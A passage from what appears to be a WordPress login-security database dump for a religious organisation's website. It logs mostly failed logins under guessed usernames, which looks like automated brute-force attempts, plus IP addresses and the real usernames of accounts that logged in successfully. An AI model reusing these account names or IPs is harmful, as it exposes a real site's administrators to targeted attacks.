Safari/537.36'),(18712,111612,1692155971.660607,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFBAB36446,'Mozilla/5.0 (iPad; CPU OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1'),(18713,111613,1692155973.828120,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF7204F6EA,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148'),(18891,113129,1692787183.572747,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF6F2073BE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(18763,111783,1692250485.389417,1,'loginFailInvalidUsername','support5',0,0x00000000000000000000FFFF717480F9,'Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36'),(18764,111814,1692260015.456370,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF588AF28A,'Mozilla/5.0 (Linux; Android 10; CPH2185) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18765,111815,1692260018.564073,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB612B146,'Mozilla/5.0 (Linux; Android 12; SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.61 Mobile Safari/537.36'),(18766,111816,1692260021.248602,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF2DA7B661,'Mozilla/5.0 (Linux; Android 11; Nokia G50) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18767,111817,1692260023.389636,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFD993AD9F,'Mozilla/5.0 (Linux; Android 11; BE2025) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18768,111818,1692260026.403587,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF2BE678D9,'Mozilla/5.0 (Linux; Android 11; moto g play (XT2093DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18769,111819,1692260029.812534,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5D72063B,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/196.0.423110124 Mobile/15E148 Safari/604.1'),(18825,112676,1692521409.625558,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18826,112677,1692521409.848262,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18827,112678,1692521410.069725,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18884,113104,1692749601.073448,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF41148D4C,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A205G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18885,113105,1692749602.888163,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF86F9AAF8,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18886,113124,1692787171.457004,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF6773C9AB,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1'),(18887,113125,1692787173.522483,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFC38A4C8E,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18888,113126,1692787175.653375,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFCAB27DDA,'Mozilla/5.0 (Linux; Android 11; LM-K920) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18889,113127,1692787178.874536,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF67964066,'Mozilla/5.0 (Linux; Android 11; SM-A125U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18890,113128,1692787180.605483,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF45A3C83E,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18784,111999,1692376220.351258,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFD19F9D9C,'Mozilla/5.0 (Linux; Android 9; KFMAWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/94.3.12 like Chrome/94.0.4606.126 Safari/537.36'),(18785,112000,1692376237.656171,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF33D3A6D7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62'),(18786,112001,1692377837.533867,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC5E7B0DE,'Mozilla/5.0 (Linux; Android 6.0.1; SM-S727VL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18787,112002,1692377881.815800,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB64B116D,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'),(18788,112003,1692377916.363138,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFCBAD584B,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/40.2  Mobile/15E148 Safari/605.1.15'),(18770,111907,1692319936.666961,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18773,111910,1692319940.157145,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18771,111908,1692319937.474157,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18772,111909,1692319938.270309,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18822,112673,1692521408.953910,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18823,112674,1692521409.179477,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18824,112675,1692521409.397709,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18746,111693,1692235498.952295,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF69AE104E,'Mozilla/5.0 (Linux; Android 12; SM-G996U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18747,111694,1692235502.093004,1,'loginFailInvalidUsername','developer007',0,0x00000000000000000000FFFFB9DC6533,'Mozilla/5.0 (Linux; Android 10; LM-Q730) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Mobile Safari/537.36'),(18748,111695,1692235504.201579,1,'loginFailInvalidUsername','developer001',0,0x00000000000000000000FFFF5F6F28AD,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1'),(18749,111696,1692235505.544624,1,'loginFailInvalidUsername','matt777',0,0x00000000000000000000FFFF5CDEBEDA,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(18750,111697,1692235508.295201,1,'loginFailInvalidUsername','support1',0,0x00000000000000000000FFFF298BF9C5,'Mozilla/5.0 (Linux; Android 10; SM-N960U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18751,111698,1692235510.626461,1,'loginFailInvalidUsername','support2',0,0x00000000000000000000FFFF6F5AB2D6,'Mozilla/5.0 (Linux; Android 12; SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36'),(18752,111699,1692235512.415292,1,'loginFailInvalidUsername','support3',0,0x00000000000000000000FFFFC3BF69A2,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18753,111700,1692235515.062504,1,'loginFailInvalidUsername','support4',0,0x00000000000000000000FFFFDB83AC8A,'Mozilla/5.0 (Linux; Android 9; U693CL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18776,111914,1692325335.025397,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18774,111911,1692319940.952820,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18775,111912,1692319941.750013,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF969E9799,'python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64'),(18791,112062,1692418130.028182,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF29D2AB4A,'Mozilla/5.0 (Linux; Android 7.1.1; SM-J700T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18792,112063,1692418145.270943,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFCBB0813D,'Mozilla/5.0 (Linux; Android 11; LM-V450) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18793,112064,1692418178.408670,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF67788714,'Mozilla/5.0 (Linux; Android 10; Nokia 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36 EdgA/96.0.1054.62'),(18794,112065,1692418197.952790,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF2BE54EA3,'Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18795,112066,1692418215.947037,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF67558428,'Mozilla/5.0 (iPad; CPU OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18796,112067,1692418242.681971,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF6BAE4328,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1'),(18797,112576,1692448473.683952,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF33514C4E,'Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18798,112578,1692449152.952281,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5E7F6EFE,'Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(18799,112587,1692454020.271570,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1082D1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18777,111925,1692329934.179815,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18778,111957,1692370585.412861,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18779,111958,1692371553.833489,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18789,112004,1692377930.697767,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF775DF9C7,'Mozilla/5.0 (Linux; Android 9; KFONWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/96.1.237 like Chrome/96.0.4664.128 Safari/537.36'),(18790,112005,1692377944.672190,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF9C603E97,'Mozilla/5.0 (Linux; Android 11; SM-T870) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(18821,112672,1692521408.734300,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18812,112663,1692520507.293660,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18813,112664,1692520507.515409,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18814,112665,1692520507.734906,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18815,112666,1692520507.958999,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18816,112667,1692520508.178234,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18817,112668,1692520508.400711,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18818,112669,1692520508.620868,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18819,112670,1692520508.848314,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18820,112671,1692520509.073003,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF147A854E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18780,111995,1692376160.712861,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF0114C77D,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18781,111996,1692376177.152799,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBA0A4D22,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Snapchat/11.59.0.27 (like Safari/8612.2.9.0.20, panda)'),(18782,111997,1692376192.832980,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFBE6B9651,'Mozilla/5.0 (Linux; Android 11; Nokia 5.4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18783,111998,1692376206.961288,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF5E9A11DA,'Mozilla/5.0 (Linux; Android 11; SM-S205DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18855,113016,1692672634.880097,1,'loginFailInvalidUsername','user',0,0x00000000000000000000FFFF8B633EE0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18856,113017,1692672635.792169,1,'loginFailInvalidUsername','user',0,0x00000000000000000000FFFF8B633EE0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18857,113018,1692672636.663406,1,'loginFailInvalidUsername','user',0,0x00000000000000000000FFFF8B633EE0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18858,113021,1692676683.331748,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF0EBFB651,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18859,113022,1692676687.245117,1,'loginFailInvalidUsername','password',0,0x00000000000000000000FFFF734F3366,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18860,113023,1692676691.040762,1,'loginFailInvalidUsername','eckankar-colorado.org!',0,0x00000000000000000000FFFF71AFC416,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18880,113100,1692749577.243200,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF7469E345,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40'),(18881,113101,1692749589.683395,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF588AF28A,'Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18882,113102,1692749594.724256,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF71A061C7,'Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18800,112591,1692464311.587476,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18883,113103,1692749598.946004,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFCA3E343A,'Mozilla/5.0 (Linux; Android 12; SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.61 Mobile Safari/537.36'),(18801,112594,1692474702.051741,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18802,112600,1692484114.846123,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF71630577,'Mozilla/5.0 (Linux; Android 11; SM-T500) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(18803,112601,1692484117.029741,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF25EE85FA,'Mozilla/5.0 (Linux; Android 12; SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18804,112602,1692484119.475477,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFCB636451,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18805,112603,1692484125.291751,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF9AD67C98,'Mozilla/5.0 (Linux; Android 8.1.0; SAMSUNG SM-J727R4) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18929,114083,1693002952.990864,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF671E779C,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.0.415307624 Mobile/15E148 Safari/604.1'),(18930,114084,1693002955.246060,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFBAB36427,'Mozilla/5.0 (Linux; Android 11; SM-A705W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18931,114085,1693002960.268450,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB36D9012,'Mozilla/5.0 (Linux; Android 11; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18932,114086,1693004035.030043,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF43CD20E9,'Mozilla/5.0 (Linux; Android 9; moto e6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18933,114087,1693004048.599031,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF2459FD43,'Mozilla/5.0 (Linux; Android 8.1.0; SM-N960U1 Build/M1AJQ; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 Mobile Safari/537.36'),(18934,114088,1693004051.342901,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB2132441,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-S367VL) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.2 Chrome/87.0.4280.141 Mobile Safari/537.36'),(18935,114089,1693004053.721214,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF71A070D1,'Mozilla/5.0 (Linux; Android 12; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18936,114090,1693004055.336770,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF55EE68DE,'Mozilla/5.0 (iPhone; CPU iPhone OS 12_5_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1'),(18937,114091,1693004056.943995,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5923E132,'Mozilla/5.0 (Linux; Android 9; KFONWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/94.4.4 like Chrome/94.0.4606.128 Safari/537.36'),(18938,114102,1693032290.446773,1,'loginFailInvalidUsername','jamar',0,0x00000000000000000000FFFFB9726175,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0'),(18939,114108,1693062237.357275,1,'loginFailInvalidUsername','CredipaginasCR',0,0x00000000000000000000FFFFD42120A0,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(18954,114210,1693151942.553536,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18969,114264,1693176984.648252,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF721F1CF2,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/187.0.410885375 Mobile/15E148 Safari/604.1'),(18970,114265,1693176991.620065,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF670CA066,'Mozilla/5.0 (Linux; Android 11; SM-A326U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18971,115318,1693229778.276013,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFACAD61F7,'Mozilla/5.0'),(18989,115384,1693262882.381807,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF7AE0A4C2,'Mozilla/5.0 (Linux; Android 12; SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18990,115385,1693262885.407748,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF67DCCF9E,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18900,113363,1692862038.491361,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18991,115386,1693262887.857908,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF268D113A,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.174 Safari/537.36'),(18901,113364,1692862039.163973,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18902,113365,1692862039.340033,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18903,113366,1692862039.530707,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18904,113367,1692862039.712914,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18905,113368,1692862039.889387,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18906,113369,1692862040.070018,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 